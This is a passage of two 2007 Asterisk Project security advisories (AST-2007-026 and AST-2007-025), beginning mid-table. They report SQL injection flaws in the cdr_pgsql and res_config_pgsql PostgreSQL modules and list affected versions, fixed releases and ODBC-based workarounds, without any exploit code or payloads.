|----------------------+-------------------------------------------------|
| Susceptibility | Remote Authenticated Sessions |
|----------------------+-------------------------------------------------|
| Severity | Moderate |
|----------------------+-------------------------------------------------|
| Exploits Known | No |
|----------------------+-------------------------------------------------|
| Reported On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Reported By | Tilghman Lesher <tlesher AT digium DOT com> |
|----------------------+-------------------------------------------------|
| Posted On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Last Updated On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Advisory Contact | Tilghman Lesher <tlesher AT digium DOT com> |
|----------------------+-------------------------------------------------|
| CVE Name | CVE-2007-6170 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Description | Input buffers were not properly escaped when providing |
| | the ANI and DNIS strings to the Call Detail Record |
| | Postgres logging engine. An attacker could potentially |
| | compromise the administrative database containing users' |
| | usernames and passwords used for SIP authentication, |
| | among other things. |
| | |
| | This module is not active by default and must be |
| | configured for use by the administrator. Default |
| | installations of Asterisk are not affected. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Workaround | Convert your installation to use cdr_odbc with the |
| | PgsqlODBC driver. This module provides similar |
| | functionality but is not vulnerable. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution | Upgrade to Asterisk release 1.4.15 or higher. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|-------------------------------+-------------+--------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|-------------------------------+-------------+--------------------------|
| Asterisk Open Source | 1.2.x | 1.2.24 and previous |
|-------------------------------+-------------+--------------------------|
| Asterisk Open Source | 1.4.x | 1.4.14 and previous |
|-------------------------------+-------------+--------------------------|
| Asterisk Business Edition | A.x.x | All versions |
|-------------------------------+-------------+--------------------------|
| Asterisk Business Edition | B.x.x | B.2.3.3 and previous |
|-------------------------------+-------------+--------------------------|
| Asterisk Business Edition | C.x.x | C.1.0-beta5 and previous |
|-------------------------------+-------------+--------------------------|
| AsteriskNOW | pre-release | None |
|-------------------------------+-------------+--------------------------|
| Asterisk Appliance Developer | 0.x.x | None |
| Kit | | |
|-------------------------------+-------------+--------------------------|
| s800i (Asterisk Appliance) | 1.0.x | None |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.2.25 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.4.15 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | B.2.3.4 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | C.1.0-beta6 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://downloads.digium.com/pub/security/AST-2007-026.pdf and |
| http://downloads.digium.com/pub/security/AST-2007-026.html |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|----------------+--------------------+----------------------------------|
| 2007-11-29 | Tilghman Lesher | Initial release |
|----------------+--------------------+----------------------------------|
| 2007-11-29 | Tilghman Lesher | Added CVE, ABE C version |
+------------------------------------------------------------------------+

Asterisk Project Security Advisory - AST-2007-026
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.

AST-2007-025 - SQL Injection issue in res_config_pgsql

2007-11-29T15:11:59Z

Asterisk Project Security Advisory - AST-2007-025

+------------------------------------------------------------------------+
| Product | Asterisk |
|----------------------+-------------------------------------------------|
| Summary | SQL Injection issue in res_config_pgsql |
|----------------------+-------------------------------------------------|
| Nature of Advisory | SQL Injection |
|----------------------+-------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|----------------------+-------------------------------------------------|
| Severity | Moderate |
|----------------------+-------------------------------------------------|
| Exploits Known | No |
|----------------------+-------------------------------------------------|
| Reported On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Reported By | P. Chisteas <p_christ AT hol DOT gr> |
|----------------------+-------------------------------------------------|
| Posted On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Last Updated On | November 29, 2007 |
|----------------------+-------------------------------------------------|
| Advisory Contact | Tilghman Lesher <tlesher AT digium DOT com> |
|----------------------+-------------------------------------------------|
| CVE Name | CVE-2007-6171 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Description | Input buffers were not properly escaped when providing |
| | lookup data to the Postgres Realtime Engine. An attacker |
| | could potentially compromise the administrative database |
| | containing users' usernames and passwords used for SIP |
| | authentication, among other things. |
| | |
| | This module is not active by default and must be |
| | configured for use by the administrator. Default |
| | installations of Asterisk are not affected. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Workaround | Convert your installation to use res_config_odbc with the |
| | PgsqlODBC driver. This module provides similar |
| | functionality but is not vulnerable. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution | Upgrade to Asterisk release 1.4.15 or higher. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.0.x | None |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.2.x | None |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.4.x | 1.4.14 and previous |
| | | versions |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | A.x.x | None |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | B.x.x | None |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | C.x.x | C.1.0-beta5 and previous |
| | | versions |
|----------------------------+-------------+-----------------------------|
| AsteriskNOW | pre-release | None |
|----------------------------+-------------+-----------------------------|
| Asterisk Appliance | 0.x.x | None |
| Developer Kit | | |
|----------------------------+-------------+-----------------------------|
| s800i (Asterisk Appliance) | 1.0.x | None |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.4.15 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | C.1.0-beta6 |
|-------------------------------------------+----------------------------|
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://downloads.digium.com/pub/security/AST-2007-025.pdf and |
| http://downloads.digium.com/pub/security/AST-2007-025.html |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|--------------+-------------------+-------------------------------------|
| 2007-11-29 | Tilghman Lesher | Initial release |
|--------------+-------------------+-------------------------------------|
| 2007-11-29 | Tilghman Lesher | Added CVE number, ABE C version |
+------------------------------------------------------------------------+

Asterisk Project Security Advisory - AST-2007-025
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.